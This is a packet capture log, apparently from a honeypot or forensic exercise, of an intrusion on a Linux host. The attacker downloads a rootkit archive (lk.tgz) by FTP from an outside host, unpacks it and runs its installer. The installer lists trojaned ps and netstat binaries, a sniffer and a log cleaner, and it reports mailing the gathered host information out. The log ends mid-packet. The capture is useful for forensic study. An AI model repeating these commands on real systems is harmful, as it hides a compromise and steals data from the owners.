TcpLen: 32 TCP Options (3) => NOP NOP TS: 23768374 2968503 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:21.651149 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:45362 IpLen:20 DgmLen:120 DF ***AP*** Seq: 0x99F95BC9 Ack: 0x903AE832 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14799163 2968504 31 35 30 20 4F 70 65 6E 69 6E 67 20 42 49 4E 41 150 Opening BINA 52 59 20 6D 6F 64 65 20 64 61 74 61 20 63 6F 6E RY mode data con 6E 65 63 74 69 6F 6E 20 66 6F 72 20 6C 6B 2E 74 nection for lk.t 67 7A 20 28 35 32 30 33 33 33 20 62 79 74 65 73 gz (520333 bytes 29 2E 0D 0A )... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:21.652709 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:122 IpLen:20 DgmLen:119 DF ***AP*** Seq: 0x596065C3 Ack: 0x9C6D2C41 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2968545 23768374 31 35 30 20 4F 70 65 6E 69 6E 67 20 42 49 4E 41 150 Opening BINA 52 59 20 6D 6F 64 65 20 64 61 74 61 20 63 6F 6E RY mode data con 6E 65 63 74 69 6F 6E 20 66 6F 72 20 6C 6B 2E 74 nection for lk.t 67 7A 20 28 35 32 30 33 33 33 20 62 79 74 65 73 gz (520333 bytes 29 2E 0A ).. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:21.666384 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:123 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x903AE832 Ack: 0x99F95C0D Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2968547 14799163 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:22.276426 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:127 IpLen:20 DgmLen:119 DF ***AP*** Seq: 0x596065C3 Ack: 0x9C6D2C41 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2968608 23768374 31 35 30 20 4F 70 65 6E 69 6E 67 20 42 49 4E 41 150 Opening BINA 52 59 20 6D 6F 64 65 20 64 61 74 61 20 63 6F 6E RY mode data con 6E 65 63 74 69 6F 6E 20 66 6F 72 20 6C 6B 2E 74 nection for lk.t 67 7A 20 28 35 32 30 33 33 33 20 62 79 74 65 73 gz (520333 bytes 29 2E 0A ).. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:22.415722 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:39829 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C41 Ack: 0x59606606 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23768433 2968545 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:22.834290 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:39831 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C41 Ack: 0x59606606 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23768475 2968608 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:55.777291 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:54097 IpLen:20 DgmLen:76 DF ***AP*** Seq: 0x99F95C0D Ack: 0x903AE832 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14802500 2968547 32 32 36 20 54 72 61 6E 73 66 65 72 20 63 6F 6D 226 Transfer com 70 6C 65 74 65 2E 0D 0A plete... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:55.797887 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:378 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x903AE832 Ack: 0x99F95C25 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2971960 14802500 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:56.333467 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:54200 IpLen:20 DgmLen:76 DF ***AP*** Seq: 0x99F95C0D Ack: 0x903AE832 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14802542 2968547 32 32 36 20 54 72 61 6E 73 66 65 72 20 63 6F 6D 226 Transfer com 70 6C 65 74 65 2E 0D 0A plete... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:56.337296 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:382 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x903AE832 Ack: 0x99F95C25 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2972013 14802542 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:57.169576 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:391 IpLen:20 DgmLen:75 DF ***AP*** Seq: 0x59606606 Ack: 0x9C6D2C41 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2972097 23768475 32 32 36 20 54 72 61 6E 73 66 65 72 20 63 6F 6D 226 Transfer com 70 6C 65 74 65 2E 0A plete.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:36:57.418223 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:63864 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C41 Ack: 0x5960661D Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23771966 2972097 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:40:55.025575 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:42762 IpLen:20 DgmLen:113 DF ***AP*** Seq: 0x99F95C25 Ack: 0x903AE832 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14826500 2972013 34 32 31 20 49 64 6C 65 20 54 69 6D 65 6F 75 74 421 Idle Timeout 20 28 32 34 30 20 73 65 63 6F 6E 64 73 29 3A 20 (240 seconds): 63 6C 6F 73 69 6E 67 20 63 6F 6E 74 72 6F 6C 20 closing control 63 6F 6E 6E 65 63 74 69 6F 6E 2E 0D 0A connection... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:40:55.026584 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:34 TOS:0x0 ID:42764 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x99F95C62 Ack: 0x903AE832 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 14826500 2972013 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:40:55.027965 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:392 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x903AE832 Ack: 0x99F95C63 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 2995881 14826500 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:44:51.590951 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:25404 IpLen:20 DgmLen:56 DF ***AP*** Seq: 0x9C6D2C41 Ack: 0x5960661D Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23819381 2972097 62 79 65 0A bye. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:44:51.595303 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:393 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0x903AE832 Ack: 0x99F95C63 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3019537 14826500 51 55 49 54 0D 0A QUIT.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:44:51.597064 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:394 IpLen:20 DgmLen:163 DF ***AP*** Seq: 0x5960661D Ack: 0x9C6D2C45 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3019537 23819381 35 32 30 33 33 33 20 62 79 74 65 73 20 72 65 63 520333 bytes rec 65 69 76 65 64 20 69 6E 20 33 35 2E 35 20 73 65 eived in 35.5 se 63 73 20 28 31 34 20 4B 62 79 74 65 73 2F 73 65 cs (14 Kbytes/se 63 29 0A 34 32 31 20 49 64 6C 65 20 54 69 6D 65 c).421 Idle Time 6F 75 74 20 28 32 34 30 20 73 65 63 6F 6E 64 73 out (240 seconds 29 3A 20 63 6C 6F 73 69 6E 67 20 63 6F 6E 74 72 ): closing contr 6F 6C 20 63 6F 6E 6E 65 63 74 69 6F 6E 2E 0A ol connection.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:44:51.598361 172.16.1.108:1026 -> 193.231.236.41:21 TCP TTL:63 TOS:0x10 ID:395 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x903AE838 Ack: 0x99F95C63 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3019537 14826500 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:44:51.791213 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:225 TOS:0x10 ID:49130 IpLen:20 DgmLen:40 *****R** Seq: 0x99F95C63 Ack: 0xFFFFFFFF Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:44:51.811850 193.231.236.41:21 -> 172.16.1.108:1026 TCP TTL:225 TOS:0x10 ID:49135 IpLen:20 DgmLen:40 *****R** Seq: 0x99F95C63 Ack: 0xFFFFFFFF Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:44:51.888400 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:25885 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C45 Ack: 0x5960668C Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23819411 3019537 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:44:59.448156 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:28574 IpLen:20 DgmLen:69 DF ***AP*** Seq: 0x9C6D2C45 Ack: 0x5960668C Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23820168 3019537 74 61 72 20 2D 7A 78 76 66 20 6C 6B 2E 74 67 7A tar -zxvf lk.tgz 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:44:59.469063 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:396 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x5960668C Ack: 0x9C6D2C56 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3020325 23820168 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:44:59.532526 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:397 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0x5960668C Ack: 0x9C6D2C56 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3020331 23820168 6C 61 73 74 2F 0A last/. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:44:59.790227 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:28845 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C56 Ack: 0x59606692 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23820201 3020331 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:44:59.792144 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:398 IpLen:20 DgmLen:410 DF ***AP*** Seq: 0x59606692 Ack: 0x9C6D2C56 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3020357 23820201 74 61 72 3A 20 41 72 63 68 69 76 65 20 63 6F 6E tar: Archive con 74 61 69 6E 73 20 66 75 74 75 72 65 20 74 69 6D tains future tim 65 73 74 61 6D 70 20 32 30 30 32 2D 30 32 2D 30 estamp 2002-02-0 38 20 30 37 3A 30 38 3A 31 33 0A 6C 61 73 74 2F 8 07:08:13.last/ 73 73 68 0A 6C 61 73 74 2F 70 69 64 66 69 6C 65 ssh.last/pidfile 0A 6C 61 73 74 2F 69 6E 73 74 61 6C 6C 0A 6C 61 .last/install.la 73 74 2F 6C 69 6E 73 6E 69 66 66 65 72 0A 6C 61 st/linsniffer.la 73 74 2F 63 6C 65 61 6E 65 72 0A 6C 61 73 74 2F st/cleaner.last/ 69 6E 65 74 64 2E 63 6F 6E 66 0A 6C 61 73 74 2F inetd.conf.last/ 6C 73 61 74 74 72 0A 6C 61 73 74 2F 73 65 72 76 lsattr.last/serv 69 63 65 73 0A 6C 61 73 74 2F 73 65 6E 73 65 0A ices.last/sense. 6C 61 73 74 2F 73 73 68 5F 63 6F 6E 66 69 67 0A last/ssh_config. 6C 61 73 74 2F 73 73 68 5F 68 6F 73 74 5F 6B 65 last/ssh_host_ke 79 0A 6C 61 73 74 2F 73 73 68 5F 68 6F 73 74 5F y.last/ssh_host_ 6B 65 79 2E 70 75 62 0A 6C 61 73 74 2F 73 73 68 key.pub.last/ssh 5F 72 61 6E 64 6F 6D 5F 73 65 65 64 0A 6C 61 73 _random_seed.las 74 2F 73 73 68 64 5F 63 6F 6E 66 69 67 0A 6C 61 t/sshd_config.la 73 74 2F 73 6C 32 0A 6C 61 73 74 2F 6C 61 73 74 st/sl2.last/last 2E 63 67 69 0A 6C 61 73 74 2F 70 73 0A 6C 61 73 .cgi.last/ps.las 74 2F 6E 65 74 73 74 61 74 0A 6C 61 73 74 2F 69 t/netstat.last/i 66 63 6F 6E 66 69 67 0A 6C 61 73 74 2F 74 6F 70 fconfig.last/top 0A 6C 61 73 74 2F 6C 6F 67 63 6C 65 61 72 0A 6C .last/logclear.l 61 73 74 2F 73 0A ast/s. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:00.179314 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:29743 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C56 Ack: 0x596067F8 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23820242 3020357 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:00.180629 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:399 IpLen:20 DgmLen:63 DF ***AP*** Seq: 0x596067F8 Ack: 0x9C6D2C56 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3020396 23820242 6C 61 73 74 2F 6D 6B 78 66 73 0A last/mkxfs. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:00.433130 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:29767 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C56 Ack: 0x59606803 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23820267 3020396 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:08.445216 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:33012 IpLen:20 DgmLen:60 DF ***AP*** Seq: 0x9C6D2C56 Ack: 0x59606803 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23821068 3020396 63 64 20 6C 61 73 74 0A cd last. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:08.459424 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:400 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x59606803 Ack: 0x9C6D2C5E Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3021224 23821068 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:11.543572 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:35290 IpLen:20 DgmLen:62 DF ***AP*** Seq: 0x9C6D2C5E Ack: 0x59606803 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23821378 3021224 2E 2F 69 6E 73 74 61 6C 6C 0A ./install. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:11.559558 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:401 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x59606803 Ack: 0x9C6D2C68 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3021534 23821378 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:11.644575 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:402 IpLen:20 DgmLen:112 DF ***AP*** Seq: 0x59606803 Ack: 0x9C6D2C68 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3021542 23821378 2A 2A 2A 2A 2A 2A 2A 2A 2A 20 49 6E 73 74 61 6C ********* Instal 61 72 65 61 20 52 6F 6F 74 6B 69 74 75 6C 75 69 area Rootkitului 20 41 20 50 6F 72 6E 69 74 20 4C 61 20 44 72 75 A Pornit La Dru 6D 20 2A 2A 2A 2A 2A 2A 2A 2A 2A 0A m *********. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:11.918238 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:35567 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C68 Ack: 0x5960683F Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23821414 3021542 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:11.920384 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:403 IpLen:20 DgmLen:540 DF ***AP*** Seq: 0x5960683F Ack: 0x9C6D2C68 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3021570 23821414 2A 2A 2A 2A 2A 2A 2A 2A 2A 20 4D 69 72 63 65 61 ********* Mircea 20 53 55 47 49 20 50 55 4C 41 20 2A 2A 2A 2A 2A SUGI PULA ***** 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A **************** 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 0A 2A 2A 2A 2A ***********.**** 2A 2A 2A 2A 2A 20 4D 75 6C 74 75 6D 69 72 69 20 ***** Multumiri 4C 61 20 54 6F 74 69 20 43 61 72 65 20 4D 2D 41 La Toti Care M-A 75 20 41 6A 75 74 61 74 20 2A 2A 2A 2A 2A 2A 2A u Ajutat ******* 2A 2A 2A 2A 2A 2A 2A 0A 2A 2A 2A 2A 2A 2A 2A 2A *******.******** 2A 20 4C 65 6D 6D 65 20 47 69 76 65 20 59 6F 75 * Lemme Give You 20 41 20 54 69 70 20 3A 20 2A 2A 2A 2A 2A 2A 2A A Tip : ******* 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A **************** 2A 2A 2A 0A 2A 2A 2A 2A 2A 2A 2A 2A 2A 20 49 67 ***.********* Ig 6E 6F 72 65 20 65 76 65 72 79 74 68 69 6E 67 2C nore everything, 20 63 61 6C 6C 20 79 6F 75 72 20 66 72 65 65 64 call your freed 6F 6D 20 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 0A om ************. 2A 2A 2A 2A 2A 2A 2A 2A 2A 20 53 63 72 65 61 6D ********* Scream 20 26 20 73 77 65 61 72 20 61 73 20 6D 75 63 68 & swear as much 20 61 73 20 79 6F 75 20 63 61 6E 20 2A 2A 2A 2A as you can **** 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 0A 2A 2A 2A 2A ***********.**** 2A 2A 2A 2A 2A 20 43 75 7A 20 61 6E 79 77 61 79 ***** Cuz anyway 20 6E 6F 62 6F 64 79 20 77 69 6C 6C 20 68 65 61 nobody will hea 72 20 79 6F 75 20 61 6E 64 20 6E 6F 20 6F 6E 65 r you and no one 20 77 69 6C 6C 20 2A 0A 2A 2A 2A 2A 2A 2A 2A 2A will *.******** 2A 20 43 61 72 65 20 61 62 6F 75 74 20 79 6F 75 * Care about you 20 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A *************** 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A 2A **************** 2A 2A 2A 0A 0A 0A 41 72 65 20 4D 61 6B 65 20 21 ***...Are Make ! 0A 41 72 65 20 47 63 63 20 21 0A 4E 75 20 41 72 .Are Gcc !.Nu Ar 65 20 53 73 68 20 21 0A 2A 20 49 6E 6C 6F 63 75 e Ssh !.* Inlocu 69 6D 20 6E 65 73 74 61 74 20 2E 2E 2E 20 61 6C im nestat ... al 65 61 20 61 6C 65 61 20 ea alea =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:12.206949 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:35586 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C68 Ack: 0x59606A27 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23821445 3021570 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:12.208448 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:404 IpLen:20 DgmLen:167 DF ***AP*** Seq: 0x59606A27 Ack: 0x9C6D2C68 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3021598 23821445 2A 20 47 61 74 61 2E 2E 2E 0A 2A 20 44 65 76 2E * Gata....* Dev. 2E 2E 20 0A 0A 2A 20 47 61 74 61 0A 2A 20 46 61 .. ..* Gata.* Fa 63 65 6D 20 44 69 72 65 63 74 6F 72 2E 2E 2E 53 cem Director...S 69 20 4D 75 74 61 6D 20 41 6C 65 61 2E 2E 20 0A i Mutam Alea.. . 2A 20 43 6F 70 69 65 6D 20 73 73 68 20 73 69 20 * Copiem ssh si 61 6C 65 61 0A 0A 0A 0A 2A 20 41 64 61 75 67 61 alea....* Adauga 6D 20 49 6E 20 53 74 61 72 74 75 70 3A 29 20 2E m In Startup:) . 2E 2E 0A ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:12.476670 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:35595 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C68 Ack: 0x59606A9A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23821470 3021598 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:14.134335 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:408 IpLen:20 DgmLen:83 DF ***AP*** Seq: 0x59606A9A Ack: 0x9C6D2C68 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3021791 23821470 2A 20 4C 75 61 6D 20 49 6E 66 6F 72 6D 61 74 69 * Luam Informati 69 6C 65 20 64 6F 72 69 74 65 20 2E 2E 2E 0A ile dorite .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:14.416430 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:37398 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C68 Ack: 0x59606AB9 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23821663 3021791 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:14.424201 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:409 IpLen:20 DgmLen:97 DF ***AP*** Seq: 0x59606AB9 Ack: 0x9C6D2C68 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 3021820 23821663 2A 20 47 61 74 61 20 21 20 54 72 69 6D 69 74 65 * Gata ! Trimite 6D 20 4D 61 69 6C 75 6C 20 2E 2E 2E 41 73 74 65 m Mailul ...Aste 61 70 74 61 20 54 65 20 52 6F 67 20 0A apta Te Rog . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:14.750735 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:37677 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9C6D2C68 Ack: 0x59606AE6 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23821697 3021820 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/15-20:45:14.752153 172.16.1.108:39168 -> 211.185.125.124:4450 TCP TTL:63 TOS:0x0 ID:413 IpLen:20 DgmLen:152 DF ***AP*** Seq: 0x59606AE6 Ack: 0x9C6D2C68 Win: 0x7D78 TcpLen: 